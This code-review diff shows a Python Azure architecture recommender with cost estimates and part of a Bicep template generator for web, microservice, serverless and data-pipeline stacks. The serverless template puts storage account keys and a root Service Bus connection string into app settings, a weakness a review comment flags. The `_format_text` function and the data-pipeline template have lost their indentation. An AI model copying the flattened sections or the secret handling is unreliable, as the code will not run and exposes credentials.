            "AKS node pools (D4s_v5 x3)": "$350-500",
            "API Management Standard v2": "$175",
            "Cosmos DB": "$100-400",
            "Service Bus Standard": "$10-50",
            "Container Registry Basic": "$5",
            "Azure Monitor": "$50-100",
            "Key Vault": "$1-5",
        },
        "pros": [
            "Full Kubernetes ecosystem",
            "Independent scaling per service",
            "Multi-language and multi-framework",
            "Mature ecosystem (Helm, Keda, Dapr)",
            "Workload identity — no credentials in pods",
        ],
        "cons": [
            "Kubernetes operational complexity",
            "Higher baseline cost",
            "Requires dedicated platform team",
            "Networking (CNI, ingress) configuration heavy",
        ],
        "scaling": {
            "users_supported": "10k - 10M",
            "requests_per_second": "1,000 - 1,000,000",
            "method": "Cluster autoscaler + KEDA event-driven autoscaling",
        },
    }
def _container_apps(users: int, reqs: Dict) -> Dict[str, Any]:
    """Build the Azure Container Apps (serverless containers) recommendation.

    Args:
        users: Expected user count. NOTE(review): unused by this builder;
            sizing is decided by the caller.
        reqs: Requirements dict; reads optional ``budget_monthly_usd``.

    Returns:
        Recommendation dict in the same shape as the other pattern builders.
    """
    budget = reqs.get("budget_monthly_usd", 500)
    return {
        "recommended_pattern": "container_apps",
        "description": "Serverless containers on Azure Container Apps",
        "use_case": "Microservices without Kubernetes management overhead",
        "service_stack": [
            "Azure Container Apps",
            "Azure Container Registry",
            "Cosmos DB",
            "Service Bus",
            "Key Vault",
            "Application Insights",
            "Entra ID managed identity",
        ],
        # Headline estimate is capped at the caller-supplied budget.
        "estimated_monthly_cost_usd": min(350, budget),
        "cost_breakdown": {
            "Container Apps (consumption)": "$50-150",
            "Container Registry Basic": "$5",
            "Cosmos DB": "$50-150",
            "Service Bus Standard": "$10-30",
            "Key Vault": "$1-5",
            "Application Insights": "$5-20",
        },
        "pros": [
            "Serverless containers — scale to zero",
            "Built-in Dapr integration",
            "KEDA autoscaling included",
            "No cluster management",
            "Simpler networking than AKS",
        ],
        "cons": [
            "Less control than full AKS",
            "Limited to HTTP and event-driven workloads",
            "Smaller ecosystem than Kubernetes",
            "Some advanced features still in preview",
        ],
        "scaling": {
            "users_supported": "1k - 500k",
            "requests_per_second": "100 - 50,000",
            "method": "KEDA scalers (HTTP, queue length, CPU, custom)",
        },
    }
def _serverless_functions(users: int, reqs: Dict) -> Dict[str, Any]:
    """Build the Azure Functions (event-driven serverless) recommendation.

    Args:
        users: Expected user count. NOTE(review): unused by this builder;
            sizing is decided by the caller.
        reqs: Requirements dict; reads optional ``budget_monthly_usd``.

    Returns:
        Recommendation dict in the same shape as the other pattern builders.
    """
    budget = reqs.get("budget_monthly_usd", 300)
    return {
        "recommended_pattern": "serverless_functions",
        "description": "Azure Functions with Event Grid and Cosmos DB",
        "use_case": "Event-driven backends, APIs, scheduled jobs, webhooks",
        "service_stack": [
            "Azure Functions (Consumption plan)",
            "Event Grid",
            "Service Bus",
            "Cosmos DB (Serverless)",
            "Azure Blob Storage",
            "Application Insights",
            "Key Vault",
        ],
        # Headline estimate is capped at the caller-supplied budget.
        "estimated_monthly_cost_usd": min(80, budget),
        "cost_breakdown": {
            "Functions (Consumption)": "$0-20 (1M free executions/month)",
            "Event Grid": "$0-5",
            "Service Bus Basic": "$0-10",
            "Cosmos DB Serverless": "$5-40",
            "Blob Storage": "$2-10",
            "Application Insights": "$5-15",
        },
        "pros": [
            "Pay-per-execution — true serverless",
            "Scale to zero, scale to millions",
            "Multiple trigger types (HTTP, queue, timer, blob, event)",
            "Durable Functions for orchestration",
            "Fast development cycle",
        ],
        "cons": [
            "Cold start latency (1-5s on consumption plan)",
            "10-minute execution timeout on consumption plan",
            "Limited local development experience",
            "Debugging distributed functions is complex",
        ],
        "scaling": {
            "users_supported": "1k - 1M",
            "requests_per_second": "100 - 100,000",
            "method": "Automatic (Azure Functions runtime scales instances)",
        },
    }
def _synapse_pipeline(users: int, reqs: Dict) -> Dict[str, Any]:
    """Build the Synapse-based data pipeline recommendation.

    Args:
        users: Expected user count. NOTE(review): unused by this builder;
            sizing is decided by the caller.
        reqs: Requirements dict; reads optional ``budget_monthly_usd``.

    Returns:
        Recommendation dict; its "scaling" section uses event/data-volume
        keys instead of user counts, unlike the web patterns.
    """
    budget = reqs.get("budget_monthly_usd", 1500)
    return {
        "recommended_pattern": "synapse_pipeline",
        "description": "Data pipeline with Event Hubs, Synapse, and Data Lake",
        "use_case": "Data warehousing, ETL, analytics, ML pipelines",
        "service_stack": [
            "Event Hubs (Standard)",
            "Data Factory / Synapse Pipelines",
            "Data Lake Storage Gen2",
            "Synapse Analytics (Serverless SQL pool)",
            "Azure Functions (processing)",
            "Power BI",
            "Azure Monitor",
        ],
        # Headline estimate is capped at the caller-supplied budget.
        "estimated_monthly_cost_usd": min(800, budget),
        "cost_breakdown": {
            "Event Hubs Standard": "$20-80",
            "Data Factory": "$50-200",
            "Data Lake Storage Gen2": "$20-80",
            "Synapse Serverless SQL": "$50-300 (per TB scanned)",
            "Azure Functions": "$10-40",
            "Power BI Pro": "$10/user/month",
        },
        "pros": [
            "Unified analytics platform (Synapse)",
            "Serverless SQL — pay per query",
            "Native Spark integration",
            "Data Lake Gen2 — hierarchical namespace, cheap storage",
            "Built-in data integration (90+ connectors)",
        ],
        "cons": [
            "Synapse learning curve",
            "Cost unpredictable with serverless SQL at scale",
            "Complex permissions model (Synapse RBAC + storage ACLs)",
            "Spark pool startup time",
        ],
        "scaling": {
            "events_per_second": "1,000 - 10,000,000",
            "data_volume": "1 GB - 1 PB per day",
            "method": "Event Hubs throughput units + Synapse auto-scale",
        },
    }
def _serverless_data(users: int, reqs: Dict) -> Dict[str, Any]:
    """Build the lightweight serverless data-pipeline recommendation.

    Args:
        users: Expected user count. NOTE(review): unused by this builder;
            sizing is decided by the caller.
        reqs: Requirements dict; reads optional ``budget_monthly_usd``.

    Returns:
        Recommendation dict; "scaling" uses event/data-volume keys like
        ``_synapse_pipeline``.
    """
    budget = reqs.get("budget_monthly_usd", 300)
    return {
        "recommended_pattern": "serverless_data",
        "description": "Lightweight data pipeline with Functions and Data Lake",
        "use_case": "Small-scale ETL, event processing, log aggregation",
        "service_stack": [
            "Azure Functions",
            "Event Grid",
            "Data Lake Storage Gen2",
            "Azure SQL Serverless",
            "Application Insights",
        ],
        # Headline estimate is capped at the caller-supplied budget.
        "estimated_monthly_cost_usd": min(120, budget),
        "cost_breakdown": {
            "Azure Functions": "$0-20",
            "Event Grid": "$0-5",
            "Data Lake Storage Gen2": "$5-20",
            "Azure SQL Serverless": "$20-60",
            "Application Insights": "$5-15",
        },
        "pros": [
            "Very low cost for small volumes",
            "Serverless end-to-end",
            "Simple to operate",
            "Scales automatically",
        ],
        "cons": [
            "Not suitable for high-volume analytics",
            "Limited transformation capabilities",
            "No built-in orchestration (use Durable Functions)",
        ],
        "scaling": {
            "events_per_second": "10 - 10,000",
            "data_volume": "1 MB - 100 GB per day",
            "method": "Azure Functions auto-scale",
        },
    }
def _multi_region_web(users: int, reqs: Dict) -> Dict[str, Any]:
    """Build the multi-region active-active web pattern recommendation.

    Args:
        users: Expected user count. NOTE(review): unused by this builder;
            sizing is decided by the caller.
        reqs: Requirements dict; reads optional ``budget_monthly_usd``.

    Returns:
        Recommendation dict in the same shape as the other pattern builders.
    """
    budget = reqs.get("budget_monthly_usd", 5000)
    return {
        "recommended_pattern": "multi_region_web",
        "description": "Multi-region active-active deployment with Front Door",
        "use_case": "Global applications, 99.99% uptime, data residency compliance",
        "service_stack": [
            "Azure Front Door (Premium)",
            "App Service (2+ regions) or AKS (2+ regions)",
            "Cosmos DB (multi-region writes)",
            "Azure SQL (geo-replication or failover groups)",
            "Traffic Manager (DNS failover)",
            "Azure Monitor + Log Analytics (centralized)",
            "Key Vault (per region)",
        ],
        # Headline estimate is capped at the caller-supplied budget.
        "estimated_monthly_cost_usd": min(3000, budget),
        "cost_breakdown": {
            "Front Door Premium": "$100-200",
            "Compute (2 regions)": "$300-1000",
            "Cosmos DB (multi-region)": "$400-1500",
            "Azure SQL geo-replication": "$200-600",
            "Monitoring": "$50-150",
            "Data transfer (cross-region)": "$50-200",
        },
        "pros": [
            "Global low latency",
            "99.99% availability",
            "Automatic failover",
            "Data residency compliance",
            "Front Door WAF at the edge",
        ],
        "cons": [
            "1.5-2x cost vs single region",
            "Data consistency challenges (Cosmos DB conflict resolution)",
            "Complex deployment pipeline",
            "Cross-region data transfer costs",
        ],
        "scaling": {
            "users_supported": "100k - 100M",
            "requests_per_second": "10,000 - 10,000,000",
            "method": "Per-region autoscale + Front Door global routing",
        },
    }
# Maps pattern keys (values of ARCHITECTURE_PATTERNS) to builder functions.
PATTERN_DISPATCH = {
    "app_service_web": _app_service_web,
    # NOTE(review): same builder as app_service_web; the builder ignores
    # `users`, so the estimate does NOT currently scale with size — confirm
    # whether a separate scaled builder was intended.
    "app_service_scaled": _app_service_web,
    "aks_microservices": _aks_microservices,
    "container_apps": _container_apps,
    "serverless_functions": _serverless_functions,
    "synapse_pipeline": _synapse_pipeline,
    "serverless_data": _serverless_data,
    "multi_region_web": _multi_region_web,
}
# ---------------------------------------------------------------------------
# Core recommendation logic
# ---------------------------------------------------------------------------
def recommend(app_type: str, users: int, requirements: Dict) -> Dict[str, Any]:
    """Return architecture recommendation for the given inputs."""
    # Resolve app type + user-count bucket to a concrete pattern builder,
    # falling back to the web-app defaults for unknown inputs.
    bucket = _size_bucket(users)
    size_map = ARCHITECTURE_PATTERNS.get(app_type, ARCHITECTURE_PATTERNS["web_app"])
    pattern_key = size_map.get(bucket, "app_service_web")
    recommendation = PATTERN_DISPATCH.get(pattern_key, _app_service_web)(users, requirements)

    # Attach compliance guidance for every recognized framework, preserving
    # the fixed HIPAA -> SOC 2 -> GDPR -> ISO 27001 ordering.
    frameworks = requirements.get("compliance", [])
    note_catalog = [
        (
            ("HIPAA",),
            "Enable Microsoft Defender for Cloud, BAA agreement, audit logging, encryption at rest with CMK",
        ),
        (
            ("SOC2",),
            "Azure Policy SOC 2 initiative, Defender for Cloud regulatory compliance dashboard",
        ),
        (
            ("GDPR",),
            "Data residency in EU region, Purview for data classification, consent management",
        ),
        (
            ("ISO27001", "ISO 27001"),
            "Azure Policy ISO 27001 initiative, audit logs to Log Analytics, access reviews in Entra ID",
        ),
    ]
    if frameworks:
        recommendation["compliance_notes"] = [
            note
            for aliases, note in note_catalog
            if any(alias in frameworks for alias in aliases)
        ]
    return recommendation
def generate_checklist(result: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return an implementation checklist for the recommended architecture."""
    # One "Deploy ..." task per service in the recommended stack.
    deploy_tasks = [f"Deploy {svc}" for svc in result.get("service_stack", [])]
    phases = [
        (
            "Planning",
            [
                "Review architecture pattern and Azure services",
                "Estimate costs with Azure Pricing Calculator",
                "Define environment strategy (dev, staging, production)",
                "Set up Azure subscription and resource groups",
                "Define tagging strategy (environment, owner, cost-center, app-name)",
            ],
        ),
        (
            "Foundation",
            [
                "Create VNet with subnets (app, data, management)",
                "Configure NSGs and Private Endpoints",
                "Set up Entra ID groups and RBAC assignments",
                "Create Key Vault and seed with initial secrets",
                "Enable Microsoft Defender for Cloud",
            ],
        ),
        ("Core Services", deploy_tasks),
        (
            "Security",
            [
                "Enable Managed Identity on all services",
                "Configure Private Endpoints for PaaS resources",
                "Set up Application Gateway or Front Door with WAF",
                "Assign Azure Policy initiatives (CIS, SOC 2, etc.)",
                "Enable diagnostic settings on all resources",
            ],
        ),
        (
            "Monitoring",
            [
                "Create Log Analytics workspace",
                "Enable Application Insights for all services",
                "Create Azure Monitor alert rules for critical metrics",
                "Set up Action Groups for notifications (email, Teams, PagerDuty)",
                "Create Azure Dashboard for operational visibility",
            ],
        ),
        (
            "CI/CD",
            [
                "Set up Azure DevOps or GitHub Actions pipeline",
                "Configure workload identity federation (no secrets in CI)",
                "Implement Bicep deployment pipeline with what-if preview",
                "Set up staging slots or blue-green deployment",
                "Document rollback procedures",
            ],
        ),
    ]
    return [{"phase": name, "tasks": tasks} for name, tasks in phases]
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def _format_text(result: Dict[str, Any]) -> str:
lines = []
lines.append(f"Pattern: {result['recommended_pattern']}")
lines.append(f"Description: {result['description']}")
lines.append(f"Use Case: {result['use_case']}")
lines.append(f"Estimated Monthly Cost: ${result['estimated_monthly_cost_usd']}")
lines.append("")
lines.append("Service Stack:")
for svc in result.get("service_stack", []):
lines.append(f" - {svc}")
lines.append("")
lines.append("Cost Breakdown:")
for k, v in result.get("cost_breakdown", {}).items():
lines.append(f" {k}: {v}")
lines.append("")
lines.append("Pros:")
for p in result.get("pros", []):
lines.append(f" + {p}")
lines.append("")
lines.append("Cons:")
for c in result.get("cons", []):
lines.append(f" - {c}")
if result.get("compliance_notes"):
lines.append("")
lines.append("Compliance Notes:")
for note in result["compliance_notes"]:
lines.append(f" * {note}")
lines.append("")
lines.append("Scaling:")
for k, v in result.get("scaling", {}).items():
lines.append(f" {k}: {v}")
return "\n".join(lines)
def main():
    """CLI entry point: parse arguments, run the recommender, print results.

    Exits with status 1 on malformed ``--requirements`` JSON.
    """
    parser = argparse.ArgumentParser(
        description="Azure Architecture Designer — recommend Azure architecture patterns based on application requirements.",
        epilog="Examples:\n"
        "  python architecture_designer.py --app-type web_app --users 10000\n"
        "  python architecture_designer.py --app-type microservices --users 50000 --json\n"
        ' python architecture_designer.py --app-type serverless --users 5000 --requirements \'{"compliance":["HIPAA"]}\'',
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument(
        "--app-type",
        required=True,
        # Must match the keys of ARCHITECTURE_PATTERNS.
        choices=["web_app", "saas_platform", "mobile_backend", "microservices", "data_pipeline", "serverless"],
        help="Application type to design for",
    )
    parser.add_argument(
        "--users",
        type=int,
        default=1000,
        help="Expected number of users (default: 1000)",
    )
    parser.add_argument(
        "--requirements",
        type=str,
        default="{}",
        help="JSON string of additional requirements (budget_monthly_usd, compliance, etc.)",
    )
    parser.add_argument(
        "--checklist",
        action="store_true",
        help="Include implementation checklist in output",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        dest="json_output",
        help="Output as JSON instead of human-readable text",
    )
    args = parser.parse_args()
    # Fail fast with a readable message rather than a traceback on bad JSON.
    try:
        reqs = json.loads(args.requirements)
    except json.JSONDecodeError as exc:
        print(f"Error: invalid --requirements JSON: {exc}", file=sys.stderr)
        sys.exit(1)
    result = recommend(args.app_type, args.users, reqs)
    if args.checklist:
        result["implementation_checklist"] = generate_checklist(result)
    if args.json_output:
        # JSON mode already embeds the checklist (if requested) in `result`.
        print(json.dumps(result, indent=2))
    else:
        print(_format_text(result))
        if args.checklist:
            print("\n--- Implementation Checklist ---")
            for phase in result["implementation_checklist"]:
                print(f"\n{phase['phase']}:")
                for task in phase["tasks"]:
                    print(f"  [ ] {task}")
if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,775 @@
#!/usr/bin/env python3
"""
Azure Bicep template generator.
Generates Bicep infrastructure-as-code scaffolds for common Azure architecture patterns.
Usage:
python bicep_generator.py --arch-type web-app
python bicep_generator.py --arch-type microservices --output main.bicep
python bicep_generator.py --arch-type serverless --json
python bicep_generator.py --help
"""
import argparse
import json
import sys
from typing import Dict
# ---------------------------------------------------------------------------
# Bicep templates
# ---------------------------------------------------------------------------
def _web_app_template() -> str:
    """Return a Bicep scaffold for the single-region web-app pattern.

    Stack: App Service (Linux) + Azure SQL serverless (Entra-only auth) +
    Key Vault (RBAC, deny-by-default network ACLs) + Log Analytics +
    Application Insights. Production environment toggles premium SKU,
    always-on, zone redundancy, and disabled public SQL access.
    """
    return r"""// =============================================================================
// Azure Web App Architecture — Bicep Template
// App Service + Azure SQL + Front Door + Key Vault + Application Insights
// =============================================================================
@description('Environment name')
@allowed(['dev', 'staging', 'production'])
param environment string = 'dev'
@description('Azure region')
param location string = resourceGroup().location
@description('Application name (lowercase, no spaces)')
@minLength(3)
@maxLength(20)
param appName string
@description('SQL admin Entra ID object ID')
param sqlAdminObjectId string
// ---------------------------------------------------------------------------
// Key Vault
// ---------------------------------------------------------------------------
resource keyVault 'Microsoft.KeyVault/vaults@2023-07-01' = {
  name: '${environment}-${appName}-kv'
  location: location
  properties: {
    sku: { family: 'A', name: 'standard' }
    tenantId: subscription().tenantId
    enableRbacAuthorization: true
    enableSoftDelete: true
    softDeleteRetentionInDays: 30
    networkAcls: {
      defaultAction: 'Deny'
      bypass: 'AzureServices'
    }
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// App Service Plan + App Service
// ---------------------------------------------------------------------------
resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = {
  name: '${environment}-${appName}-plan'
  location: location
  sku: {
    name: environment == 'production' ? 'P1v3' : 'B1'
    tier: environment == 'production' ? 'PremiumV3' : 'Basic'
    capacity: 1
  }
  properties: {
    reserved: true // Linux
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
resource appService 'Microsoft.Web/sites@2023-01-01' = {
  name: '${environment}-${appName}-web'
  location: location
  properties: {
    serverFarmId: appServicePlan.id
    httpsOnly: true
    siteConfig: {
      linuxFxVersion: 'NODE|20-lts'
      minTlsVersion: '1.2'
      ftpsState: 'Disabled'
      alwaysOn: environment == 'production'
      healthCheckPath: '/health'
    }
  }
  identity: {
    type: 'SystemAssigned'
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// Azure SQL (Serverless)
// ---------------------------------------------------------------------------
resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = {
  name: '${environment}-${appName}-sql'
  location: location
  properties: {
    administrators: {
      administratorType: 'ActiveDirectory'
      azureADOnlyAuthentication: true
      principalType: 'Group'
      sid: sqlAdminObjectId
      tenantId: subscription().tenantId
    }
    minimalTlsVersion: '1.2'
    publicNetworkAccess: environment == 'production' ? 'Disabled' : 'Enabled'
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = {
  parent: sqlServer
  name: '${appName}-db'
  location: location
  sku: {
    name: 'GP_S_Gen5_2'
    tier: 'GeneralPurpose'
  }
  properties: {
    autoPauseDelay: environment == 'production' ? -1 : 60
    minCapacity: json('0.5')
    zoneRedundant: environment == 'production'
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// Application Insights + Log Analytics
// ---------------------------------------------------------------------------
resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
  name: '${environment}-${appName}-logs'
  location: location
  properties: {
    sku: { name: 'PerGB2018' }
    retentionInDays: environment == 'production' ? 90 : 30
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
resource appInsights 'Microsoft.Insights/components@2020-02-02' = {
  name: '${environment}-${appName}-ai'
  location: location
  kind: 'web'
  properties: {
    Application_Type: 'web'
    WorkspaceResourceId: logAnalytics.id
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// Outputs
// ---------------------------------------------------------------------------
output appServiceUrl string = 'https://${appService.properties.defaultHostName}'
output keyVaultUri string = keyVault.properties.vaultUri
output appInsightsKey string = appInsights.properties.InstrumentationKey
output sqlServerFqdn string = sqlServer.properties.fullyQualifiedDomainName
"""
def _microservices_template() -> str:
    """Return a Bicep template for an AKS-based microservices architecture.

    The generated template provisions Key Vault, an AKS cluster (system +
    app node pools with autoscaling), Azure Container Registry, Cosmos DB,
    a Service Bus namespace, Log Analytics, and Application Insights.
    Production vs. dev sizing is switched on the ``environment`` parameter.
    """
    # NOTE(review): resource names concatenate environment and appName
    # (up to 20 chars); long combinations may exceed Azure naming limits
    # (e.g. Key Vault max 24 characters) — confirm expected input sizes.
    return r"""// =============================================================================
// Azure Microservices Architecture — Bicep Template
// AKS + API Management + Cosmos DB + Service Bus + Key Vault
// =============================================================================
@description('Environment name')
@allowed(['dev', 'staging', 'production'])
param environment string = 'dev'
@description('Azure region')
param location string = resourceGroup().location
@description('Application name')
@minLength(3)
@maxLength(20)
param appName string
@description('AKS admin Entra ID group object ID')
param aksAdminGroupId string
// ---------------------------------------------------------------------------
// Key Vault
// ---------------------------------------------------------------------------
resource keyVault 'Microsoft.KeyVault/vaults@2023-07-01' = {
  name: '${environment}-${appName}-kv'
  location: location
  properties: {
    sku: { family: 'A', name: 'standard' }
    tenantId: subscription().tenantId
    enableRbacAuthorization: true
    enableSoftDelete: true
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// AKS Cluster
// ---------------------------------------------------------------------------
resource aksCluster 'Microsoft.ContainerService/managedClusters@2024-01-01' = {
  name: '${environment}-${appName}-aks'
  location: location
  identity: { type: 'SystemAssigned' }
  properties: {
    dnsPrefix: '${environment}-${appName}'
    kubernetesVersion: '1.29'
    enableRBAC: true
    aadProfile: {
      managed: true
      adminGroupObjectIDs: [aksAdminGroupId]
      enableAzureRBAC: true
    }
    networkProfile: {
      networkPlugin: 'azure'
      networkPolicy: 'azure'
      serviceCidr: '10.0.0.0/16'
      dnsServiceIP: '10.0.0.10'
    }
    agentPoolProfiles: [
      {
        name: 'system'
        count: environment == 'production' ? 3 : 1
        vmSize: 'Standard_D2s_v5'
        mode: 'System'
        enableAutoScaling: true
        minCount: 1
        maxCount: 3
        availabilityZones: environment == 'production' ? ['1', '2', '3'] : []
      }
      {
        name: 'app'
        count: environment == 'production' ? 3 : 1
        vmSize: 'Standard_D4s_v5'
        mode: 'User'
        enableAutoScaling: true
        minCount: 1
        maxCount: 10
        availabilityZones: environment == 'production' ? ['1', '2', '3'] : []
      }
    ]
    addonProfiles: {
      omsagent: {
        enabled: true
        config: {
          logAnalyticsWorkspaceResourceID: logAnalytics.id
        }
      }
    }
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// Container Registry
// ---------------------------------------------------------------------------
resource acr 'Microsoft.ContainerRegistry/registries@2023-07-01' = {
  name: '${environment}${appName}acr'
  location: location
  sku: { name: environment == 'production' ? 'Standard' : 'Basic' }
  properties: {
    adminUserEnabled: false
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// Cosmos DB (Serverless for dev, Autoscale for prod)
// ---------------------------------------------------------------------------
resource cosmosAccount 'Microsoft.DocumentDB/databaseAccounts@2023-11-15' = {
  name: '${environment}-${appName}-cosmos'
  location: location
  kind: 'GlobalDocumentDB'
  properties: {
    databaseAccountOfferType: 'Standard'
    consistencyPolicy: { defaultConsistencyLevel: 'Session' }
    locations: [
      { locationName: location, failoverPriority: 0, isZoneRedundant: environment == 'production' }
    ]
    capabilities: environment == 'dev' ? [{ name: 'EnableServerless' }] : []
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// Service Bus
// ---------------------------------------------------------------------------
resource serviceBus 'Microsoft.ServiceBus/namespaces@2022-10-01-preview' = {
  name: '${environment}-${appName}-sb'
  location: location
  sku: { name: 'Standard', tier: 'Standard' }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// Log Analytics + Application Insights
// ---------------------------------------------------------------------------
resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
  name: '${environment}-${appName}-logs'
  location: location
  properties: {
    sku: { name: 'PerGB2018' }
    retentionInDays: environment == 'production' ? 90 : 30
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
resource appInsights 'Microsoft.Insights/components@2020-02-02' = {
  name: '${environment}-${appName}-ai'
  location: location
  kind: 'web'
  properties: {
    Application_Type: 'web'
    WorkspaceResourceId: logAnalytics.id
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// Outputs
// ---------------------------------------------------------------------------
output aksClusterName string = aksCluster.name
output acrLoginServer string = acr.properties.loginServer
output cosmosEndpoint string = cosmosAccount.properties.documentEndpoint
output serviceBusEndpoint string = '${serviceBus.name}.servicebus.windows.net'
output keyVaultUri string = keyVault.properties.vaultUri
"""
def _serverless_template() -> str:
    """Return a Bicep template for a serverless event-driven architecture.

    The generated template provisions a Functions storage account, a Linux
    Consumption-plan Function App, a serverless Cosmos DB account, a
    Service Bus namespace with an ``orders`` queue, Log Analytics, and
    Application Insights.
    """
    # NOTE(review): the template injects the storage account key and the
    # Service Bus root connection string directly into app settings;
    # consider Key Vault references / managed identity for production.
    return r"""// =============================================================================
// Azure Serverless Architecture — Bicep Template
// Azure Functions + Event Grid + Service Bus + Cosmos DB
// =============================================================================
@description('Environment name')
@allowed(['dev', 'staging', 'production'])
param environment string = 'dev'
@description('Azure region')
param location string = resourceGroup().location
@description('Application name')
@minLength(3)
@maxLength(20)
param appName string
// ---------------------------------------------------------------------------
// Storage Account (required by Functions)
// ---------------------------------------------------------------------------
resource storageAccount 'Microsoft.Storage/storageAccounts@2023-01-01' = {
  name: '${environment}${appName}st'
  location: location
  sku: { name: 'Standard_LRS' }
  kind: 'StorageV2'
  properties: {
    supportsHttpsTrafficOnly: true
    minimumTlsVersion: 'TLS1_2'
    allowBlobPublicAccess: false
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// Azure Functions (Consumption Plan)
// ---------------------------------------------------------------------------
resource functionPlan 'Microsoft.Web/serverfarms@2023-01-01' = {
  name: '${environment}-${appName}-func-plan'
  location: location
  sku: {
    name: 'Y1'
    tier: 'Dynamic'
  }
  properties: {
    reserved: true // Linux
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
resource functionApp 'Microsoft.Web/sites@2023-01-01' = {
  name: '${environment}-${appName}-func'
  location: location
  kind: 'functionapp,linux'
  identity: { type: 'SystemAssigned' }
  properties: {
    serverFarmId: functionPlan.id
    httpsOnly: true
    siteConfig: {
      linuxFxVersion: 'NODE|20'
      minTlsVersion: '1.2'
      ftpsState: 'Disabled'
      appSettings: [
        { name: 'AzureWebJobsStorage', value: 'DefaultEndpointsProtocol=https;AccountName=${storageAccount.name};EndpointSuffix=core.windows.net;AccountKey=${storageAccount.listKeys().keys[0].value}' }
        { name: 'FUNCTIONS_EXTENSION_VERSION', value: '~4' }
        { name: 'FUNCTIONS_WORKER_RUNTIME', value: 'node' }
        { name: 'APPINSIGHTS_INSTRUMENTATIONKEY', value: appInsights.properties.InstrumentationKey }
        { name: 'COSMOS_ENDPOINT', value: cosmosAccount.properties.documentEndpoint }
        { name: 'SERVICE_BUS_CONNECTION', value: listKeys('${serviceBus.id}/AuthorizationRules/RootManageSharedAccessKey', serviceBus.apiVersion).primaryConnectionString }
      ]
    }
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// Cosmos DB (Serverless)
// ---------------------------------------------------------------------------
resource cosmosAccount 'Microsoft.DocumentDB/databaseAccounts@2023-11-15' = {
  name: '${environment}-${appName}-cosmos'
  location: location
  kind: 'GlobalDocumentDB'
  properties: {
    databaseAccountOfferType: 'Standard'
    consistencyPolicy: { defaultConsistencyLevel: 'Session' }
    locations: [
      { locationName: location, failoverPriority: 0 }
    ]
    capabilities: [{ name: 'EnableServerless' }]
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// Service Bus
// ---------------------------------------------------------------------------
resource serviceBus 'Microsoft.ServiceBus/namespaces@2022-10-01-preview' = {
  name: '${environment}-${appName}-sb'
  location: location
  sku: { name: 'Basic', tier: 'Basic' }
  tags: {
    environment: environment
    'app-name': appName
  }
}
resource orderQueue 'Microsoft.ServiceBus/namespaces/queues@2022-10-01-preview' = {
  parent: serviceBus
  name: 'orders'
  properties: {
    maxDeliveryCount: 5
    defaultMessageTimeToLive: 'P7D'
    deadLetteringOnMessageExpiration: true
    lockDuration: 'PT1M'
  }
}
// ---------------------------------------------------------------------------
// Application Insights + Log Analytics
// ---------------------------------------------------------------------------
resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
  name: '${environment}-${appName}-logs'
  location: location
  properties: {
    sku: { name: 'PerGB2018' }
    retentionInDays: 30
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
resource appInsights 'Microsoft.Insights/components@2020-02-02' = {
  name: '${environment}-${appName}-ai'
  location: location
  kind: 'web'
  properties: {
    Application_Type: 'web'
    WorkspaceResourceId: logAnalytics.id
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}
// ---------------------------------------------------------------------------
// Outputs
// ---------------------------------------------------------------------------
output functionAppUrl string = 'https://${functionApp.properties.defaultHostName}'
output cosmosEndpoint string = cosmosAccount.properties.documentEndpoint
output serviceBusEndpoint string = '${serviceBus.name}.servicebus.windows.net'
output appInsightsKey string = appInsights.properties.InstrumentationKey
"""
def _data_pipeline_template() -> str:
return r"""// =============================================================================
// Azure Data Pipeline Architecture — Bicep Template
// Event Hubs + Data Lake Gen2 + Synapse Analytics + Azure Functions
// =============================================================================
@description('Environment name')
@allowed(['dev', 'staging', 'production'])
param environment string = 'dev'
@description('Azure region')
param location string = resourceGroup().location
@description('Application name')
@minLength(3)
@maxLength(20)
param appName string
// ---------------------------------------------------------------------------
// Data Lake Storage Gen2
// ---------------------------------------------------------------------------
resource dataLake 'Microsoft.Storage/storageAccounts@2023-01-01' = {
name: '${environment}${appName}dl'
location: location
sku: { name: environment == 'production' ? 'Standard_ZRS' : 'Standard_LRS' }
kind: 'StorageV2'
properties: {
isHnsEnabled: true // Hierarchical namespace for Data Lake Gen2
supportsHttpsTrafficOnly: true
minimumTlsVersion: 'TLS1_2'
allowBlobPublicAccess: false
}
tags: {
environment: environment
'app-name': appName
}
}
resource rawContainer 'Microsoft.Storage/storageAccounts/blobServices/containers@2023-01-01' = {
name: '${dataLake.name}/default/raw'
